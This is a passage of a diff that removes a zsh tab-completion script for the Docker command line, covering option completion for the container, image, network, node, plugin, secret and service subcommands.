$opts_help \ - "($help -L --follow-link)"{-L,--follow-link}"[Always follow symbol link]" \ - "($help -)1:container:->container" \ - "($help -)2:hostpath:_files" && ret=0 - case $state in - (container) - if compset -P "*:"; then - _files && ret=0 - else - __docker_complete_containers -qS ":" && ret=0 - fi - ;; - esac - ;; - (create) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_run \ - $opts_create_run_update \ - "($help -): :__docker_complete_images" \ - "($help -):command: _command_names -e" \ - "($help -)*::arguments: _normal" && ret=0 - case $state in - (link) - if compset -P "*:"; then - _wanted alias expl "Alias" compadd -E "" && ret=0 - else - __docker_complete_running_containers -qS ":" && ret=0 - fi - ;; - esac - ;; - (diff) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (exec) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_attach_exec_run_start \ - "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ - "($help)*"{-e=,--env=}"[Set environment variables]:environment variable: " \ - "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" \ - "($help)--privileged[Give extended Linux capabilities to the command]" \ - "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" \ - "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" \ - "($help -):containers:__docker_complete_running_containers" \ - "($help -)*::command:->anycommand" && ret=0 - case $state in - (anycommand) - shift 1 words - (( CURRENT-- )) - _normal && ret=0 - ;; - esac - ;; - (export) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -o --output)"{-o=,--output=}"[Write to a file, instead of stdout]:output file:_files" \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -s --size)"{-s,--size}"[Display total file sizes]" \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (kill) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -s --signal)"{-s=,--signal=}"[Signal to send]:signal:_signals" \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (logs) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--details[Show extra details provided to logs]" \ - "($help -f --follow)"{-f,--follow}"[Follow log output]" \ - "($help -s --since)"{-s=,--since=}"[Show logs since this timestamp]:timestamp: " \ - "($help -t --timestamps)"{-t,--timestamps}"[Show timestamps]" \ - "($help)--tail=[Output the last K lines]:lines:(1 10 20 50 all)" \ - "($help -)*:containers:__docker_complete_containers" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Show all containers]" \ - "($help)--before=[Show only container created before...]:containers:__docker_complete_containers" \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_ps_filters" \ - "($help)--format=[Pretty-print containers using a Go template]:template: " \ - "($help -l --latest)"{-l,--latest}"[Show only the latest created container]" \ - "($help -n --last)"{-n=,--last=}"[Show n last created containers (includes all states)]:n:(1 5 10 25 50)" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ - "($help -s --size)"{-s,--size}"[Display total file sizes]" \ - "($help)--since=[Show only containers created since...]:containers:__docker_complete_containers" && ret=0 - ;; - (pause|unpause) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (port) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:containers:__docker_complete_running_containers" \ - "($help -)2:port:_ports" && ret=0 - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (rename) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -):old name:__docker_complete_containers" \ - "($help -):new name: " && ret=0 - ;; - (restart) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ - "($help -)*:containers:__docker_complete_containers_ids" && ret=0 - ;; - (rm) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force removal]" \ - "($help -l --link)"{-l,--link}"[Remove the specified link and not the underlying container]" \ - "($help -v --volumes)"{-v,--volumes}"[Remove the volumes associated to the container]" \ - "($help -)*:containers:->values" && ret=0 - case $state in - (values) - if [[ ${words[(r)-f]} == -f || ${words[(r)--force]} == --force ]]; then - __docker_complete_containers && ret=0 - else - __docker_complete_stopped_containers && ret=0 - fi - ;; - esac - ;; - (run) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_run \ - $opts_create_run_update \ - $opts_attach_exec_run_start \ - "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ - "($help)--health-cmd=[Command to run to check health]:command: " \ - "($help)--health-interval=[Time between running the check]:time: " \ - "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" \ - "($help)--health-timeout=[Maximum time to allow one check to run]:time: " \ - "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" \ - "($help)--rm[Remove intermediate containers when it exits]" \ - "($help)--runtime=[Name of the runtime to be used for that container]:runtime:__docker_complete_runtimes" \ - "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ - "($help)--stop-signal=[Signal to kill a container]:signal:_signals" \ - "($help)--storage-opt=[Storage driver options for the container]:storage options:->storage-opt" \ - "($help -): :__docker_complete_images" \ - "($help -):command: _command_names -e" \ - "($help -)*::arguments: _normal" && ret=0 - case $state in - (link) - if compset -P "*:"; then - _wanted alias expl "Alias" compadd -E "" && ret=0 - else - __docker_complete_running_containers -qS ":" && ret=0 - fi - ;; - (storage-opt) - if compset -P "*="; then - _message "value" && ret=0 - else - opts=('size') - _describe -t filter-opts "storage options" opts -qS "=" && ret=0 - fi - ;; - esac - ;; - (start) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_attach_exec_run_start \ - "($help -a --attach)"{-a,--attach}"[Attach container's stdout/stderr and forward all signals]" \ - "($help -i --interactive)"{-i,--interactive}"[Attach container's stding]" \ - "($help -)*:containers:__docker_complete_stopped_containers" && ret=0 - ;; - (stats) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Show all containers (default shows just running)]" \ - "($help)--format=[Pretty-print images using a Go template]:template: " \ - "($help)--no-stream[Disable streaming stats and only pull the first result]" \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (stop) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (top) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:containers:__docker_complete_running_containers" \ - "($help -)*:: :->ps-arguments" && ret=0 - case $state in - (ps-arguments) - _ps && ret=0 - ;; - esac - ;; - (update) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - opts_create_run_update \ - "($help -)*: :->values" && ret=0 - case $state in - (values) - if [[ ${words[(r)--kernel-memory*]} = (--kernel-memory*) ]]; then - __docker_complete_stopped_containers && ret=0 - else - __docker_complete_containers && ret=0 - fi - ;; - esac - ;; - (wait) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:containers:__docker_complete_running_containers" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 - ;; - esac - - return ret -} - -# EO container - -# BO image - -__docker_image_commands() { - local -a _docker_image_subcommands - _docker_image_subcommands=( - "build:Build an image from a Dockerfile" - "history:Show the history of an image" - "import:Import the contents from a tarball to create a filesystem image" - "inspect:Display detailed information on one or more images" - "load:Load an image from a tar archive or STDIN" - "ls:List images" - "prune:Remove unused images" - "pull:Pull an image or a repository from a registry" - "push:Push an image or a repository to a registry" - "rm:Remove one or more images" - "save:Save one or more images to a tar archive (streamed to STDOUT by default)" - "tag:Tag an image into a repository" - ) - _describe -t docker-image-commands "docker image command" _docker_image_subcommands -} - -__docker_image_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (build) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--build-arg=[Build-time variables]:=: " \ - "($help)*--cache-from=[Images to consider as cache sources]: :__docker_complete_repositories_with_tags" \ - "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" \ - "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " \ - "($help)--compress[Compress the build context using gzip]" \ - "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " \ - "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " \ - "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " \ - "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " \ - "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " \ - "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " \ - "($help)--disable-content-trust[Skip image verification]" \ - "($help -f --file)"{-f=,--file=}"[Name of the Dockerfile]:Dockerfile:_files" \ - "($help)--force-rm[Always remove intermediate containers]" \ - "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" \ - "($help)*--label=[Set metadata for an image]:label=value: " \ - "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " \ - "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " \ - "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" \ - "($help)--no-cache[Do not use cache when building the image]" \ - "($help)--pull[Attempt to pull a newer version of the image]" \ - "($help -q --quiet)"{-q,--quiet}"[Suppress verbose build output]" \ - "($help)--rm[Remove intermediate containers after a successful build]" \ - "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " \ - "($help -t --tag)*"{-t=,--tag=}"[Repository, name and tag for the image]: :__docker_complete_repositories_with_tags" \ - "($help)*--ulimit=[ulimit options]:ulimit: " \ - "($help)--userns=[Container user namespace]:user namespace:(host)" \ - "($help -):path or URL:_directories" && ret=0 - ;; - (history) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -H --human)"{-H,--human}"[Print sizes and dates in human readable format]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ - "($help -)*: :__docker_complete_images" && ret=0 - ;; - (import) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ - "($help -m --message)"{-m=,--message=}"[Commit message for imported image]:message: " \ - "($help -):URL:(- http:// file://)" \ - "($help -): :__docker_complete_repositories_with_tags" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -)*:images:__docker_complete_images" && ret=0 - ;; - (load) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -i --input)"{-i=,--input=}"[Read from tar archive file]:archive file:_files -g \"*.((tar|TAR)(.gz|.GZ|.Z|.bz2|.lzma|.xz|)|(tbz|tgz|txz))(-.)\"" \ - "($help -q --quiet)"{-q,--quiet}"[Suppress the load output]" && ret=0 - ;; - (ls|list) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Show all images]" \ - "($help)--digests[Show digests]" \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ - "($help)--format=[Pretty-print images using a Go template]:template: " \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ - "($help -): :__docker_complete_repositories" && ret=0 - case $state in - (filter-options) - __docker_complete_images_filters && ret=0 - ;; - esac - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Remove all unused images, not just dangling ones]" \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (pull) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all-tags)"{-a,--all-tags}"[Download all tagged images]" \ - "($help)--disable-content-trust[Skip image verification]" \ - "($help -):name:__docker_search" && ret=0 - ;; - (push) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--disable-content-trust[Skip image signing]" \ - "($help -): :__docker_complete_images" && ret=0 - ;; - (rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force removal]" \ - "($help)--no-prune[Do not delete untagged parents]" \ - "($help -)*: :__docker_complete_images" && ret=0 - ;; - (save) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -o --output)"{-o=,--output=}"[Write to file]:file:_files" \ - "($help -)*: :__docker_complete_images" && ret=0 - ;; - (tag) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -):source:__docker_complete_images"\ - "($help -):destination:__docker_complete_repositories_with_tags" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 - ;; - esac - - return ret -} - -# EO image - -# BO network - -__docker_network_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (driver) - __docker_complete_info_plugins Network && ret=0 - ;; - (id) - __docker_complete_networks_ids && ret=0 - ;; - (name) - __docker_complete_networks_names && ret=0 - ;; - (type) - type_opts=('builtin' 'custom') - _describe -t type-filter-opts "Type Filter Options" type_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('driver' 'id' 'label' 'name' 'type') - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_get_networks() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines networks - - type=$1; shift - - lines=(${(f)${:-"$(_call_program commands docker $docker_options network ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Network ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[NETWORK ID]},${end[NETWORK ID]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" - s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" - networks=($networks $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" - s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" - networks=($networks $s) - done - fi - - _describe -t networks-list "networks" networks "$@" && ret=0 - return ret -} - -__docker_complete_networks() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_networks all "$@" -} - -__docker_complete_networks_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_networks ids "$@" -} - -__docker_complete_networks_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_networks names "$@" -} - -__docker_network_commands() { - local -a _docker_network_subcommands - _docker_network_subcommands=( - "connect:Connect a container to a network" - "create:Creates a new network with a name specified by the user" - "disconnect:Disconnects a container from a network" - "inspect:Displays detailed information on a network" - "ls:Lists all the networks created by the user" - "prune:Remove all unused networks" - "rm:Deletes one or more networks" - ) - _describe -t docker-network-commands "docker network command" _docker_network_subcommands -} - -__docker_network_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (connect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--alias=[Add network-scoped alias for the container]:alias: " \ - "($help)--ip=[Container IPv4 address]:IPv4: " \ - "($help)--ip6=[Container IPv6 address]:IPv6: " \ - "($help)*--link=[Add a link to another container]:link:->link" \ - "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " \ - "($help -)1:network:__docker_complete_networks" \ - "($help -)2:containers:__docker_complete_containers" && ret=0 - - case $state in - (link) - if compset -P "*:"; then - _wanted alias expl "Alias" compadd -E "" && ret=0 - else - __docker_complete_running_containers -qS ":" && ret=0 - fi - ;; - esac - ;; - (create) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)--attachable[Enable manual container attachment]" \ - "($help)*--aux-address[Auxiliary IPv4 or IPv6 addresses used by network driver]:key=IP: " \ - "($help -d --driver)"{-d=,--driver=}"[Driver to manage the Network]:driver:(null host bridge overlay)" \ - "($help)*--gateway=[IPv4 or IPv6 Gateway for the master subnet]:IP: " \ - "($help)--internal[Restricts external access to the network]" \ - "($help)*--ip-range=[Allocate container ip from a sub-range]:IP/mask: " \ - "($help)--ipam-driver=[IP Address Management Driver]:driver:(default)" \ - "($help)*--ipam-opt=[Custom IPAM plugin options]:opt=value: " \ - "($help)--ipv6[Enable IPv6 networking]" \ - "($help)*--label=[Set metadata on a network]:label=value: " \ - "($help)*"{-o=,--opt=}"[Driver specific options]:opt=value: " \ - "($help)*--subnet=[Subnet in CIDR format that represents a network segment]:IP/mask: " \ - "($help -)1:Network Name: " && ret=0 - ;; - (disconnect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:network:__docker_complete_networks" \ - "($help -)2:containers:__docker_complete_containers" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -)*:network:__docker_complete_networks" && ret=0 - ;; - (ls) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--no-trunc[Do not truncate the output]" \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--format=[Pretty-print networks using a Go template]:template: " \ - "($help -q --quiet)"{-q,--quiet}"[Only display numeric IDs]" && ret=0 - case $state in - (filter-options) - __docker_network_complete_ls_filters && ret=0 - ;; - esac - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:network:__docker_complete_networks" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 - ;; - esac - - return ret -} - -# EO network - -# BO node - -__docker_node_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (id) - __docker_complete_nodes_ids && ret=0 - ;; - (membership) - membership_opts=('accepted' 'pending' 'rejected') - _describe -t membership-opts "membership options" membership_opts && ret=0 - ;; - (name) - __docker_complete_nodes_names && ret=0 - ;; - (role) - role_opts=('manager' 'worker') - _describe -t role-opts "role options" role_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('id' 'label' 'membership' 'name' 'role') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_node_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (desired-state) - state_opts=('accepted' 'running') - _describe -t state-opts "desired state options" state_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('desired-state' 'id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_nodes() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines nodes args - - type=$1; shift - filter=$1; shift - [[ $filter != "none" ]] && args=("-f $filter") - - lines=(${(f)${:-"$(_call_program commands docker $docker_options node ls $args)"$'\n'}}) - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Node ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - nodes=($nodes $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - nodes=($nodes $s) - done - fi - - _describe -t nodes-list "nodes" nodes "$@" && ret=0 - return ret -} - -__docker_complete_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all none "$@" -} - -__docker_complete_nodes_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes ids none "$@" -} - -__docker_complete_nodes_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes names none "$@" -} - -__docker_complete_pending_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all "membership=pending" "$@" -} - -__docker_complete_manager_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all "role=manager" "$@" -} - -__docker_complete_worker_nodes() { - [[ $PREFIX = -* ]] && return 1 - __docker_nodes all "role=worker" "$@" -} - -__docker_node_commands() { - local -a _docker_node_subcommands - _docker_node_subcommands=( - "demote:Demote a node as manager in the swarm" - "inspect:Display detailed information on one or more nodes" - "ls:List nodes in the swarm" - "promote:Promote a node as manager in the swarm" - "rm:Remove one or more nodes from the swarm" - "ps:List tasks running on one or more nodes, defaults to current node" - "update:Update a node" - ) - _describe -t docker-node-commands "docker node command" _docker_node_subcommands -} - -__docker_node_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (rm|remove) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force remove a node from the swarm]" \ - "($help -)*:node:__docker_complete_pending_nodes" && ret=0 - ;; - (demote) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:node:__docker_complete_manager_nodes" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help)--pretty[Print the information in a human friendly format]" \ - "($help -)*:node:__docker_complete_nodes" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 - case $state in - (filter-options) - __docker_node_complete_ls_filters && ret=0 - ;; - esac - ;; - (promote) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:node:__docker_complete_worker_nodes" && ret=0 - ;; - (ps) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Display all instances]" \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--no-resolve[Do not map IDs to Names]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -)*:node:__docker_complete_nodes" && ret=0 - case $state in - (filter-options) - __docker_node_complete_ps_filters && ret=0 - ;; - esac - ;; - (update) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--availability=[Availability of the node]:availability:(active pause drain)" \ - "($help)*--label-add=[Add or update a node label]:key=value: " \ - "($help)*--label-rm=[Remove a node label if exists]:label: " \ - "($help)--role=[Role of the node]:role:(manager worker)" \ - "($help -)1:node:__docker_complete_nodes" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_node_commands" && ret=0 - ;; - esac - - return ret -} - -# EO node - -# BO plugin - -__docker_complete_plugins() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines plugins - - lines=(${(f)${:-"$(_call_program commands docker $docker_options plugin ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Name - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[TAG]},${end[TAG]}]}%% ##}}" - plugins=($plugins $s) - done - - _describe -t plugins-list "plugins" plugins "$@" && ret=0 - return ret -} - -__docker_plugin_commands() { - local -a _docker_plugin_subcommands - _docker_plugin_subcommands=( - "disable:Disable a plugin" - "enable:Enable a plugin" - "inspect:Return low-level information about a plugin" - "install:Install a plugin" - "ls:List plugins" - "push:Push a plugin" - "rm:Remove a plugin" - "set:Change settings for a plugin" - ) - _describe -t docker-plugin-commands "docker plugin command" _docker_plugin_subcommands -} - -__docker_plugin_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (disable|enable|inspect|ls|push|rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:plugin:__docker_complete_plugins" && ret=0 - ;; - (install) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--alias=[Local name for plugin]:alias: " \ - "($help -)1:plugin:__docker_complete_plugins" && ret=0 - ;; - (set) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:plugin:__docker_complete_plugins" \ - "($help-)*:key=value: " && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_plugin_commands" && ret=0 - ;; - esac - - return ret -} - -# EO plugin - -# BO secret - -__docker_secrets() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines secrets - - type=$1; shift - - lines=(${(f)${:-"$(_call_program commands docker $docker_options secret ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - secrets=($secrets $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - secrets=($secrets $s) - done - fi - - _describe -t secrets-list "secrets" secrets "$@" && ret=0 - return ret -} - -__docker_complete_secrets() { - [[ $PREFIX = -* ]] && return 1 - __docker_secrets all "$@" -} - -__docker_secret_commands() { - local -a _docker_secret_subcommands - _docker_secret_subcommands=( - "create:Create a secret using stdin as content" - "inspect:Display detailed information on one or more secrets" - "ls:List secrets" - "rm:Remove one or more secrets" - ) - _describe -t docker-secret-commands "docker secret command" _docker_secret_subcommands -} - -__docker_secret_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (create) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)*"{-l=,--label=}"[Secret labels]:label: " \ - "($help -):secret: " && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given Go template]:template: " \ - "($help -)*:secret:__docker_complete_secrets" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 - ;; - (rm|remove) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:secret:__docker_complete_secrets" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_secret_commands" && ret=0 - ;; - esac - - return ret -} - -# EO secret - -# BO service - -__docker_service_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (id) - __docker_complete_services_ids && ret=0 - ;; - (name) - __docker_complete_services_names && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_service_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then 